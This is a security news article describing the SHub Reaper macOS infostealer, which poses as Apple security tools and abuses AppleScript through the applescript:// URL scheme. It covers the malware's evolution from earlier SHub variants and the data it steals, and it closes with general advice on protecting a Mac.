New macOS Infostealer Poses as Apple Security Tools to Steal Sensitive Data

By

Introduction

A recently discovered macOS infostealer, dubbed SHub Reaper, is leveraging the guise of official Apple security software to compromise users' systems. According to SentinelOne, this malware targets passwords, cryptocurrency wallets, and sensitive files while abusing legitimate macOS features to evade detection. This article explores how Reaper operates, its evolution from earlier variants, and what users can do to stay protected.

How SHub Reaper Works

SHub Reaper disguises itself as authentic Apple security tools, tricking victims into installing it. Once inside, the malware employs AppleScript and legitimate macOS system processes to execute its malicious activities. By mimicking trusted tools, Reaper can bypass traditional antivirus scanners that rely on signature-based detection.

Abuse of AppleScript and URL Schemes

Unlike earlier versions, Reaper cleverly exploits the applescript:// URL scheme to launch commands via macOS's built-in Script Editor. This technique enables the malware to automatically run malicious AppleScript code without requiring the user to manually paste commands into Terminal—a common requirement for older variants. The result is a smoother infection process that appears more legitimate to unsuspecting users.

Stealth and Persistence

The malware uses legitimate system processes to hide its activities, making it harder for security software to flag it. By piggybacking on processes that macOS trusts, Reaper can maintain persistence on infected machines, stealing data over time without raising alarms. Researchers at SentinelOne note that this represents a significant leap in sophistication for the SHub Stealer malware family.

Evolution from SHub Stealer

The SHub malware family has been active for at least two years, primarily targeting macOS users through criminal campaigns. Earlier versions, such as the original SHub Stealer, relied on fake installers and ClickFix social engineering—a tactic that tricked victims into copying and pasting malicious Terminal commands after clicking a fake error message.

Reaper builds upon these methods by integrating with macOS's Script Editor, streamlining the attack vector. This evolution shows how threat actors continuously refine their tools to exploit user trust in operating system utilities.

What Information Is Stolen?

Once deployed, SHub Reaper gathers:

• Passwords: Saved credentials from browsers and applications.
• Cryptocurrency wallets: Private keys and wallet data from popular crypto apps.
• Sensitive files: Documents, images, and other personal data that can be exfiltrated.

The stolen data is sent to remote command-and-control servers controlled by attackers, who can then use it for identity theft, financial fraud, or further targeted attacks.

How to Protect Yourself

Although SHub Reaper is sophisticated, users can take several steps to reduce risk.

Verify Software Source

Always download software directly from the official App Store or from developer websites you trust. Be wary of any pop-up messages urging you to install security tools, especially those that claim to be from Apple but direct you to external URLs.

Keep macOS Updated

Apple regularly releases security patches that fix vulnerabilities exploited by malware like Reaper. Ensure your system is up to date by enabling automatic updates.

Use Reliable Security Software

While Reaper attempts to evade traditional scanners, employing reputable antivirus solutions that include behavioral detection can help identify suspicious activity on your Mac.

Conclusion

SHub Reaper represents a growing trend of macOS malware that leverages native system features to avoid detection. By disguising itself as Apple security tools and abusing AppleScript, it poses a serious threat to users' passwords, cryptocurrency, and personal files. Staying vigilant about software sources, applying updates, and using robust security tools are the best defences against this evolving infostealer.

For ongoing updates, follow our analysis and check official security advisories from Apple and SentinelOne.

Related Articles

• 10 Critical Insights Into Websites With Undefined Trust Levels
• Chipotle Hires Burger King Marketing Star Fernando Machado to Reverse Sales Slump
• Decoding the Language Shift: Why an AI Coding Assistant Switched from Chinese to Korean
• How to Implement Design Dialects in Your Product System: A Step-by-Step Guide
• Breaking: Amazon Slashes iPad A16 Prices to $299 in Limited-Time Sale
• How to Understand the Impact of Subquadratic's $29M Seed Round and 12M-Token Context Window
• Building Financial Products That Last: From MVP to Bedrock
• How to Modernize Your Databases for AI Using Azure Accelerate: A Step-by-Step Guide